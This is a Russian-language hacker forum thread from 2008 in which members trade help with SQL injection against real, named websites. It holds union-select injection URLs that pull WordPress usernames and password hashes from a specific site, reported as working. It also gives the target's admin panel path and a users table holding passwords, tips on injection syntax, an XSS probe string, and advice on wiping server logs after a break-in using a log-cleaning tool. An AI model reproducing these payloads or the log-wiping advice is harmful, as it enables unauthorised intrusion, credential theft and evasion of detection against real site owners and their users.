Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Вот админка
    http://www.sngboard.ru/Admin/
    (надо с большой буквы).


    2 hulk
    Вот все колонки в этой таблице

    email
    id
    firstname
    lastname
    password
    phone
     
    1 person likes this.
  2. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    @diznt
    /* пробовал? Если использовать --, то нужно так:
    /index.php?pid=-1'+union+select+1,2,3,4,5,6,7--%20-
    также пробуй #
    /index.php?pid=-1'+union+select+1,2,3,4,5,6,7%23
     
    1 person likes this.
  3. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Если он определил кол-во столбцов через --, то и в конструкции union+select юзается так же -- . Возможно двойной запрос? Хотя ошибка синтаксическая.
    Попробуй подзапросы
    +and+substring(version(),1,1)=5--
    (4,3)
     
  4. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    @beerhack
    чтение дир возможно благодаря FreeBSD, юзай вот этот скрипт
    http://www.blacktoad.info/releases/dir_parsing.txt
    @jokester
    в MySQL регистр таблиц и колонок не имеет значения
     
  5. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    если использовать --, то для MySQL необходимо указывать -- с пробелом:
    --%20
     
  6. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Ты вместо того, что-бы написать это посмотрел-бы линк.

    Я не говорил про mysql, я говорил про этот пример
    Вот линки :

    http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_login,user_pass),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+wordpress.WP_USERS/*
    Table 'wordpress.WP_USERS' doesn't exist

    http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_login,user_pass),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+wordpress.wp_users/*
    вывод
     
  7. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Почему это "необходимо"? Вообще ни разу не юзал --%20, у меня работает и "--" на ура.
     
    2 people like this.
  8. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    http://dev.mysql.com/doc/refman/5.0/en/comments.html
    http://dev.mysql.com/doc/refman/5.0/en/ansi-diff-comments.html
     
    #3528 [Raz0r], 5 Nov 2008
    Last edited: 5 Nov 2008
    2 people like this.
  9. NetSter

    NetSter Moderator

    Joined:
    30 Jul 2007
    Messages:
    810
    Likes Received:
    414
    Reputations:
    62
    при добавлении коммента "><script>alert()</script> к фотке не одном из сайтов имеем сообщение:
    Fatal error: Cannot redeclare class_mysql::$sql_login in /usr/local/www/worlds.ru/req/mysql.class on line 7
    что это может быть?
    ps/ сильно не пинать я только начинаю)
    -------------EDIT---------------------
    комменты и так не работают...
    спс desTiny )
    -------------EDIT---------------------
     
    _________________________
    #3529 NetSter, 7 Nov 2008
    Last edited: 7 Nov 2008
  10. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Как понять? При подборе столбцов через order by принтит стандартную ошибку
    Unknown column '100' in 'order clause'
    Но и при 1 пишет
    Unknown column '1' in 'order clause'
    Юнион селект эррорят.
    Первый раз сталкиваюсь.
     
  11. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    ссылку в пм или сюда
     
    1 person likes this.
  12. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Ушла в пм.
     
  13. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,006
    Likes Received:
    444
    Reputations:
    94
    Imperou$: потому что ты, видимо, пишешь order by '1' вместо order by 1
    NetSter, а так просто коммент добавляется, если без всяких скриптов и тп?
     
    1 person likes this.
  14. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Если сайт рабочий, и через какие либо праметры передаются значения в БД, то ИМХО в таблице есть хоть 1 столбцы! Возможно админ сделал фейковую скулю. Дай мне url я посмотрю...
     
    2 people like this.
  15. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    А может используются несколько запросов с одинаковыми параметрами? И ни в том ни в другом случае запрос не получается правильным...
     
  16. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    desTiny
    Всё правильно пишу.

    Просто вывода не было.
    Разобрался,скуль в другом скрипте на этом сайте.
    Большое спасибо DimOnOID
     
  17. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Народ я к примеру похекал сайт (через скуль) и хочу удалить логи (там же вроде при запросе в скуле, все записываеться в логи) при этом есть полный доступ к серверу! как это мне сделать?
     
  18. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Что б почистить логи можешь воспользоваться "ванишем", и у тебя обязательно должны быть права рута! иначе никак.....
     
  19. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    _Pantera_ а по нормальному можно???
     
  20. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    У тебя нет доступа к логам апача. Только если ты пользователь с максимальными правами(в линуксе - root), ты можешь их почистить. Хз где лежат в твоем случае. Скорей всего на уровень выше от корня www-дирректории.
     
    #3540 Chaak, 8 Nov 2008
    Last edited: 8 Nov 2008
    1 person likes this.
Thread Status:
Not open for further replies.